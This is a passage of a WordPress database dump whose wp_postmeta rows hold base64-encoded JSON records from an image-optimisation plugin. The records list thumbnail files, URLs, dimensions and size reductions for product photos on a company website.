HRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTMsInRpbWUiOjE0ODM1NzM3MzEsImlkIjoxMjc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNzMzLCJpZCI6MTI3OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzczNSwiaWQiOjEyNzl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM3MzgsImlkIjoxMjc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNzQwLCJpZCI6MTI3OX1d'); 
INSERT INTO `wp_postmeta` VALUES (29631, 1277, 'wpfc_optimisation_reduction', '12522'); 
INSERT INTO `wp_postmeta` VALUES (29632, 1277, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTczNzQ1LCJpZCI6IjEyNzcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjA1LCJ0aW1lIjoxNDgzNTczNzQ4LCJpZCI6MTI3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjk5OSwidGltZSI6MTQ4MzU3Mzc1MywiaWQiOjEyNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjo5NTIsInRpbWUiOjE0ODM1NzM3NTcsImlkIjoxMjc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyNjE1LCJ0aW1lIjoxNDgzNTczNzYyLCJpZCI6MTI3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU5MiwidGltZSI6MTQ4MzU3Mzc2NSwiaWQiOjEyNzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTAsInRpbWUiOjE0ODM1NzM3NjgsImlkIjoxMjc3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTczNzcxLCJpZCI6MTI3N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjc5NCwidGltZSI6MTQ4MzU3Mzc3NSwiaWQiOjEyNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjU2MCwidGltZSI6MTQ4MzU3Mzc3OSwiaWQiOjEyNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjU4MiwidGltZSI6MTQ4MzU3Mzc4MiwiaWQiOjEyNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjY4NCwidGltZSI6MTQ4MzU3Mzc4NSwiaWQiOjEyNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg1OCwidGltZSI6MTQ4MzU3Mzc4OSwiaWQiOjEyNzd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMzksInRpbWUiOjE0ODM1NzM3OTMsImlkIjoxMjc3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZnItNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNmci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2ZyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxMjEzLCJ0aW1lIjoxNDgzNTczNzk2LCJpZCI6MTI3N31d'); 
INSERT INTO `wp_postmeta` VALUES (29633, 1275, 'wpfc_optimisation_reduction', '16402'); 
INSERT INTO `wp_postmeta` VALUES (29634, 1275, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMuanBnIiwid2lkdGgiOjczMjgsImhlaWdodCI6NTA1MiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3MzgwMSwiaWQiOiIxMjc1In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEwNjAsInRpbWUiOjE0ODM1NzM4MDUsImlkIjoxMjc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtODAweDU1Mi5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU1MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTgwMHg1NTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy04MDB4NTUyLmpwZyIsInJlZHVjdGlvbiI6MTYyMSwidGltZSI6MTQ4MzU3MzgwOSwiaWQiOjEyNzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy03Njh4NTI5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTI5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtNzY4eDUyOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTc2OHg1MjkuanBnIiwicmVkdWN0aW9uIjoxNjA2LCJ0aW1lIjoxNDgzNTczODEzLCJpZCI6MTI3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTE2MDB4MTEwMy5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMTAzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMTYwMHgxMTAzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMTYwMHgxMTAzLmpwZyIsInJlZHVjdGlvbiI6MzgyOSwidGltZSI6MTQ4MzU3MzgxOSwiaWQiOjEyNzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo4MTgsInRpbWUiOjE0ODM1NzM4MjIsImlkIjoxMjc1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NjY4LCJ0aW1lIjoxNDgzNTczODI2LCJpZCI6MTI3NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjc1OCwidGltZSI6MTQ4MzU3MzgzMCwiaWQiOjEyNzV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL2